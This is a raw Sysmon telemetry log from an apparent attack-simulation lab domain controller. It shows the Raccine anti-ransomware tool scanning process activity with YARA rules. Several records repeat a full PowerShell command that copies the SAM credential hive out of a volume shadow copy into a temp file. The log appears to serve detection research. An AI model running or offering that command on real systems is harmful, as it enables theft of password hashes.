Files\Raccine\Raccine.exe{9DBE88B5-3BBF-61B2-8B05-010000000E02}4888C:\Program Files\Raccine\yara64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\Raccine\Raccine.exe+127ef|C:\Program Files\Raccine\Raccine.exe+5e97|C:\Program Files\Raccine\Raccine.exe+18dc|C:\Program Files\Raccine\Raccine.exe+16914|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000002165448Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 17:24:15.311{9DBE88B5-3BBF-61B2-8B05-010000000E02}4888C:\Program Files\Raccine\yara64.exe-----"C:\Program Files\Raccine\yara64.exe" "C:\Program Files\Raccine\yara\gen_ransomware_command_lines.yar" C:\Users\ADMINI~1\AppData\Local\Temp\RaccineUserContext\Rac10A6.tmp -d Name="powershell.exe" -d ExecutablePath="C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -d CommandLine="'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' & {write-host \''\''$shadowlist = get-wmiobject win32_shadowcopy$volumenumbers = foreach($shadowcopy in $shadowlist){$shadowcopy.DeviceObject[-1]}$maxvolume = ($volumenumbers | Sort-Object -Descending)[0]$shadowpath = \''\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy\'' + $maxvolume + \''\Windows\System32\config\SAM\''$mydump = $ENV:temp + '\' + 'myhive'[System.IO.File]::Copy($shadowpath , $mydump)} mp)} " -d TimeSinceExeCreation=1878 -d ParentName="powershell.exe" -d ParentExecutablePath="C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -d ParentCommandLine="'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' " -d ParentTimeSinceExeCreation=1878 -d GrandParentName="(unavailable)" -d GrandParentExecutablePath="" -d GrandParentCommandLine="" -d GrandParentTimeSinceExeCreation=0C:\Users\ADMINI~1\AppData\Local\Temp\ATTACKRANGE\Administrator{9DBE88B5-3A8F-61AE-5CC3-9B0500000000}0x59bc35c2HighMD5=21F3213DA30E04E7EAE6AB37873D96ED,SHA256=63E9D2FEBB3705D5C9BC7489BCEC2B957AAEF8A5D13D0EBAEDC65965D65947E6,IMPHASH=C66AE7C04AD509B05651E45E6E91359E{9DBE88B5-3BBF-61B2-8305-010000000E02}7852C:\Program Files\Raccine\Raccine.exe"C:\Program Files\Raccine\Raccine.exe" "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" & {write-host \""\"" $shadowlist = get-wmiobject win32_shadowcopy $volumenumbers = foreach($shadowcopy in $shadowlist){$shadowcopy.DeviceObject[-1]} $maxvolume = ($volumenumbers | Sort-Object -Descending)[0] $shadowpath = \""\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy\"" + $maxvolume + \""\Windows\System32\config\SAM\"" $mydump = $ENV:temp + '\' + 'myhive' [System.IO.File]::Copy($shadowpath , $mydump)} 10341000x80000000000000002165443Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 17:24:15.293{9DBE88B5-3BBF-61B2-8A05-010000000E02}61927328C:\Windows\system32\conhost.exe{9DBE88B5-3BBF-61B2-8905-010000000E02}4720C:\Program Files\Raccine\yara64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002165437Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 17:24:15.281{9DBE88B5-3A8E-61AE-DBA7-000000000E02}44926092C:\Windows\system32\csrss.exe{9DBE88B5-3BBF-61B2-8905-010000000E02}4720C:\Program Files\Raccine\yara64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002165436Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 17:24:15.280{9DBE88B5-3BBF-61B2-8305-010000000E02}78525916C:\Program Files\Raccine\Raccine.exe{9DBE88B5-3BBF-61B2-8905-010000000E02}4720C:\Program Files\Raccine\yara64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\Raccine\Raccine.exe+127ef|C:\Program Files\Raccine\Raccine.exe+5e97|C:\Program Files\Raccine\Raccine.exe+18dc|C:\Program Files\Raccine\Raccine.exe+16914|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000002165435Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 17:24:15.281{9DBE88B5-3BBF-61B2-8905-010000000E02}4720C:\Program Files\Raccine\yara64.exe-----"C:\Program Files\Raccine\yara64.exe" "C:\Program Files\Raccine\yara\gen_raccine_kills.yar" C:\Users\ADMINI~1\AppData\Local\Temp\RaccineUserContext\Rac10A6.tmp -d Name="powershell.exe" -d ExecutablePath="C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -d CommandLine="'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' & {write-host \''\''$shadowlist = get-wmiobject win32_shadowcopy$volumenumbers = foreach($shadowcopy in $shadowlist){$shadowcopy.DeviceObject[-1]}$maxvolume = ($volumenumbers | Sort-Object -Descending)[0]$shadowpath = \''\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy\'' + $maxvolume + \''\Windows\System32\config\SAM\''$mydump = $ENV:temp + '\' + 'myhive'[System.IO.File]::Copy($shadowpath , $mydump)} mp)} " -d TimeSinceExeCreation=1878 -d ParentName="powershell.exe" -d ParentExecutablePath="C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -d ParentCommandLine="'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' " -d ParentTimeSinceExeCreation=1878 -d GrandParentName="(unavailable)" -d GrandParentExecutablePath="" -d GrandParentCommandLine="" -d GrandParentTimeSinceExeCreation=0C:\Users\ADMINI~1\AppData\Local\Temp\ATTACKRANGE\Administrator{9DBE88B5-3A8F-61AE-5CC3-9B0500000000}0x59bc35c2HighMD5=21F3213DA30E04E7EAE6AB37873D96ED,SHA256=63E9D2FEBB3705D5C9BC7489BCEC2B957AAEF8A5D13D0EBAEDC65965D65947E6,IMPHASH=C66AE7C04AD509B05651E45E6E91359E{9DBE88B5-3BBF-61B2-8305-010000000E02}7852C:\Program Files\Raccine\Raccine.exe"C:\Program Files\Raccine\Raccine.exe" "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" & {write-host \""\"" $shadowlist = get-wmiobject win32_shadowcopy $volumenumbers = foreach($shadowcopy in $shadowlist){$shadowcopy.DeviceObject[-1]} $maxvolume = ($volumenumbers | Sort-Object -Descending)[0] $shadowpath = \""\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy\"" + $maxvolume + \""\Windows\System32\config\SAM\"" $mydump = $ENV:temp + '\' + 'myhive' [System.IO.File]::Copy($shadowpath , $mydump)} 10341000x80000000000000002165432Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 17:24:15.264{9DBE88B5-3BBF-61B2-8805-010000000E02}42926112C:\Windows\system32\conhost.exe{9DBE88B5-3BBF-61B2-8705-010000000E02}6460C:\Program Files\Raccine\yara64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002165426Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 17:24:15.252{9DBE88B5-3A8E-61AE-DBA7-000000000E02}44924832C:\Windows\system32\csrss.exe{9DBE88B5-3BBF-61B2-8705-010000000E02}6460C:\Program Files\Raccine\yara64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002165425Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 17:24:15.252{9DBE88B5-3BBF-61B2-8305-010000000E02}78525916C:\Program Files\Raccine\Raccine.exe{9DBE88B5-3BBF-61B2-8705-010000000E02}6460C:\Program Files\Raccine\yara64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\Raccine\Raccine.exe+127ef|C:\Program Files\Raccine\Raccine.exe+5e97|C:\Program Files\Raccine\Raccine.exe+18dc|C:\Program Files\Raccine\Raccine.exe+16914|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000002165424Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 17:24:15.252{9DBE88B5-3BBF-61B2-8705-010000000E02}6460C:\Program Files\Raccine\yara64.exe-----"C:\Program Files\Raccine\yara64.exe" "C:\Program Files\Raccine\yara\gen_powershell_invocation.yar" C:\Users\ADMINI~1\AppData\Local\Temp\RaccineUserContext\Rac10A6.tmp -d Name="powershell.exe" -d ExecutablePath="C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -d CommandLine="'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' & {write-host \''\''$shadowlist = get-wmiobject win32_shadowcopy$volumenumbers = foreach($shadowcopy in $shadowlist){$shadowcopy.DeviceObject[-1]}$maxvolume = ($volumenumbers | Sort-Object -Descending)[0]$shadowpath = \''\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy\'' + $maxvolume + \''\Windows\System32\config\SAM\''$mydump = $ENV:temp + '\' + 'myhive'[System.IO.File]::Copy($shadowpath , $mydump)} mp)} " -d TimeSinceExeCreation=1878 -d ParentName="powershell.exe" -d ParentExecutablePath="C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -d ParentCommandLine="'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' " -d ParentTimeSinceExeCreation=1878 -d GrandParentName="(unavailable)" -d GrandParentExecutablePath="" -d GrandParentCommandLine="" -d GrandParentTimeSinceExeCreation=0C:\Users\ADMINI~1\AppData\Local\Temp\ATTACKRANGE\Administrator{9DBE88B5-3A8F-61AE-5CC3-9B0500000000}0x59bc35c2HighMD5=21F3213DA30E04E7EAE6AB37873D96ED,SHA256=63E9D2FEBB3705D5C9BC7489BCEC2B957AAEF8A5D13D0EBAEDC65965D65947E6,IMPHASH=C66AE7C04AD509B05651E45E6E91359E{9DBE88B5-3BBF-61B2-8305-010000000E02}7852C:\Program Files\Raccine\Raccine.exe"C:\Program Files\Raccine\Raccine.exe" "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" & {write-host \""\"" $shadowlist = get-wmiobject win32_shadowcopy $volumenumbers = foreach($shadowcopy in $shadowlist){$shadowcopy.DeviceObject[-1]} $maxvolume = ($volumenumbers | Sort-Object -Descending)[0] $shadowpath = \""\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy\"" + $maxvolume + \""\Windows\System32\config\SAM\"" $mydump = $ENV:temp + '\' + 'myhive' [System.IO.File]::Copy($shadowpath , $mydump)} 10341000x80000000000000002165421Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 17:24:15.235{9DBE88B5-3BBF-61B2-8605-010000000E02}67085456C:\Windows\system32\conhost.exe{9DBE88B5-3BBF-61B2-8505-010000000E02}6928C:\Program Files\Raccine\yara64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002165415Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 17:24:15.218{9DBE88B5-3A8E-61AE-DBA7-000000000E02}44926092C:\Windows\system32\csrss.exe{9DBE88B5-3BBF-61B2-8505-010000000E02}6928C:\Program Files\Raccine\yara64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002165414Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 17:24:15.217{9DBE88B5-3BBF-61B2-8305-010000000E02}78525916C:\Program Files\Raccine\Raccine.exe{9DBE88B5-3BBF-61B2-8505-010000000E02}6928C:\Program Files\Raccine\yara64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\Raccine\Raccine.exe+127ef|C:\Program Files\Raccine\Raccine.exe+5e97|C:\Program Files\Raccine\Raccine.exe+18dc|C:\Program Files\Raccine\Raccine.exe+16914|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000002165413Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 17:24:15.217{9DBE88B5-3BBF-61B2-8505-010000000E02}6928C:\Program Files\Raccine\yara64.exe-----"C:\Program Files\Raccine\yara64.exe" "C:\Program Files\Raccine\yara\ext-vars-test.yar" C:\Users\ADMINI~1\AppData\Local\Temp\RaccineUserContext\Rac10A6.tmp -d Name="powershell.exe" -d ExecutablePath="C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -d CommandLine="'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' & {write-host \''\''$shadowlist = get-wmiobject win32_shadowcopy$volumenumbers = foreach($shadowcopy in $shadowlist){$shadowcopy.DeviceObject[-1]}$maxvolume = ($volumenumbers | Sort-Object -Descending)[0]$shadowpath = \''\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy\'' + $maxvolume + \''\Windows\System32\config\SAM\''$mydump = $ENV:temp + '\' + 'myhive'[System.IO.File]::Copy($shadowpath , $mydump)} mp)} " -d TimeSinceExeCreation=1878 -d ParentName="powershell.exe" -d ParentExecutablePath="C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -d ParentCommandLine="'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' " -d ParentTimeSinceExeCreation=1878 -d GrandParentName="(unavailable)" -d GrandParentExecutablePath="" -d GrandParentCommandLine="" -d GrandParentTimeSinceExeCreation=0C:\Users\ADMINI~1\AppData\Local\Temp\ATTACKRANGE\Administrator{9DBE88B5-3A8F-61AE-5CC3-9B0500000000}0x59bc35c2HighMD5=21F3213DA30E04E7EAE6AB37873D96ED,SHA256=63E9D2FEBB3705D5C9BC7489BCEC2B957AAEF8A5D13D0EBAEDC65965D65947E6,IMPHASH=C66AE7C04AD509B05651E45E6E91359E{9DBE88B5-3BBF-61B2-8305-010000000E02}7852C:\Program Files\Raccine\Raccine.exe"C:\Program Files\Raccine\Raccine.exe" "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" & {write-host \""\"" $shadowlist = get-wmiobject win32_shadowcopy $volumenumbers = foreach($shadowcopy in $shadowlist){$shadowcopy.DeviceObject[-1]} $maxvolume = ($volumenumbers | Sort-Object -Descending)[0] $shadowpath = \""\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy\"" + $maxvolume + \""\Windows\System32\config\SAM\"" $mydump = $ENV:temp + '\' + 'myhive' [System.IO.File]::Copy($shadowpath , $mydump)} 10341000x80000000000000002165411Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 17:24:15.214{9DBE88B5-3BA0-61B2-4205-010000000E02}39207816C:\Windows\system32\wbem\wmiprvse.exe{9DBE88B5-3BBF-61B2-8305-010000000E02}7852C:\Program Files\Raccine\Raccine.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+7a583|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\combase.dll+2800|C:\Windows\System32\RPCRT4.dll+62d8b|C:\Windows\System32\combase.dll+6536c|C:\Windows\System32\combase.dll+65022|C:\Windows\System32\combase.dll+63938|C:\Windows\System32\combase.dll+6169d|C:\Windows\System32\combase.dll+60d6f|C:\Windows\System32\combase.dll+7c2c9|C:\Windows\System32\RPCRT4.dll+4a284|C:\Windows\System32\RPCRT4.dll+4919d|C:\Windows\System32\RPCRT4.dll+49cee|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000002165396Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 17:24:15.206{9DBE88B5-3BA0-61B2-4205-010000000E02}39207816C:\Windows\system32\wbem\wmiprvse.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+7a583|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\combase.dll+2800|C:\Windows\System32\RPCRT4.dll+62d8b|C:\Windows\System32\combase.dll+6536c|C:\Windows\System32\combase.dll+65022|C:\Windows\System32\combase.dll+63938|C:\Windows\System32\combase.dll+6169d|C:\Windows\System32\combase.dll+60d6f|C:\Windows\System32\combase.dll+7c2c9|C:\Windows\System32\RPCRT4.dll+4a284|C:\Windows\System32\RPCRT4.dll+4919d|C:\Windows\System32\RPCRT4.dll+49cee|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000002165330Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 17:24:15.164{9DBE88B5-C32E-61A8-0C00-000000000E02}8485240C:\Windows\system32\svchost.exe{9DBE88B5-3BBF-61B2-8305-010000000E02}7852C:\Program Files\Raccine\Raccine.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+54c6|C:\Windows\System32\RPCRT4.dll+7a583|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653ea|C:\Windows\System32\RPCRT4.dll+4a284|C:\Windows\System32\RPCRT4.dll+4919d|C:\Windows\System32\RPCRT4.dll+49a4b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002165328Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 17:24:15.159{9DBE88B5-3BA0-61B2-4205-010000000E02}39207816C:\Windows\system32\wbem\wmiprvse.exe{9DBE88B5-3BBF-61B2-8305-010000000E02}7852C:\Program Files\Raccine\Raccine.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+7a583|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\combase.dll+2800|C:\Windows\System32\RPCRT4.dll+62d8b|C:\Windows\System32\combase.dll+6536c|C:\Windows\System32\combase.dll+65022|C:\Windows\System32\combase.dll+63938|C:\Windows\System32\combase.dll+6169d|C:\Windows\System32\combase.dll+60d6f|C:\Windows\System32\combase.dll+7c2c9|C:\Windows\System32\RPCRT4.dll+4a284|C:\Windows\System32\RPCRT4.dll+4919d|C:\Windows\System32\RPCRT4.dll+49cee|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000002165313Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 17:24:15.151{9DBE88B5-3BA0-61B2-4205-010000000E02}39207816C:\Windows\system32\wbem\wmiprvse.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+7a583|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\combase.dll+2800|C:\Windows\System32\RPCRT4.dll+62d8b|C:\Windows\System32\combase.dll+6536c|C:\Windows\System32\combase.dll+65022|C:\Windows\System32\combase.dll+63938|C:\Windows\System32\combase.dll+6169d|C:\Windows\System32\combase.dll+60d6f|C:\Windows\System32\combase.dll+7c2c9|C:\Windows\System32\RPCRT4.dll+4a284|C:\Windows\System32\RPCRT4.dll+4919d|C:\Windows\System32\RPCRT4.dll+49cee|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000002165247Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 17:24:15.109{9DBE88B5-C32E-61A8-0C00-000000000E02}8485240C:\Windows\system32\svchost.exe{9DBE88B5-3BBF-61B2-8305-010000000E02}7852C:\Program Files\Raccine\Raccine.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+54c6|C:\Windows\System32\RPCRT4.dll+7a583|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653ea|C:\Windows\System32\RPCRT4.dll+4a284|C:\Windows\System32\RPCRT4.dll+4919d|C:\Windows\System32\RPCRT4.dll+49a4b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002165246Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 17:24:15.109{9DBE88B5-3BBF-61B2-8305-010000000E02}78525916C:\Program Files\Raccine\Raccine.exe{9DBE88B5-3AAE-61AE-0DA8-000000000E02}6776C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Raccine\Raccine.exe+c914|C:\Program Files\Raccine\Raccine.exe+5894|C:\Program Files\Raccine\Raccine.exe+18dc|C:\Program Files\Raccine\Raccine.exe+16914|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002165244Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 17:24:15.104{9DBE88B5-3BA0-61B2-4205-010000000E02}39207816C:\Windows\system32\wbem\wmiprvse.exe{9DBE88B5-3BBF-61B2-8305-010000000E02}7852C:\Program Files\Raccine\Raccine.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+7a583|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\combase.dll+2800|C:\Windows\System32\RPCRT4.dll+62d8b|C:\Windows\System32\combase.dll+6536c|C:\Windows\System32\combase.dll+65022|C:\Windows\System32\combase.dll+63938|C:\Windows\System32\combase.dll+6169d|C:\Windows\System32\combase.dll+60d6f|C:\Windows\System32\combase.dll+7c2c9|C:\Windows\System32\RPCRT4.dll+4a284|C:\Windows\System32\RPCRT4.dll+4919d|C:\Windows\System32\RPCRT4.dll+49cee|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000002165229Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 17:24:15.096{9DBE88B5-3BA0-61B2-4205-010000000E02}39207816C:\Windows\system32\wbem\wmiprvse.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+7a583|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\combase.dll+2800|C:\Windows\System32\RPCRT4.dll+62d8b|C:\Windows\System32\combase.dll+6536c|C:\Windows\System32\combase.dll+65022|C:\Windows\System32\combase.dll+63938|C:\Windows\System32\combase.dll+6169d|C:\Windows\System32\combase.dll+60d6f|C:\Windows\System32\combase.dll+7c2c9|C:\Windows\System32\RPCRT4.dll+4a284|C:\Windows\System32\RPCRT4.dll+4919d|C:\Windows\System32\RPCRT4.dll+49cee|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000002165163Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 17:24:15.053{9DBE88B5-C32E-61A8-0C00-000000000E02}8485240C:\Windows\system32\svchost.exe{9DBE88B5-3BBF-61B2-8305-010000000E02}7852C:\Program 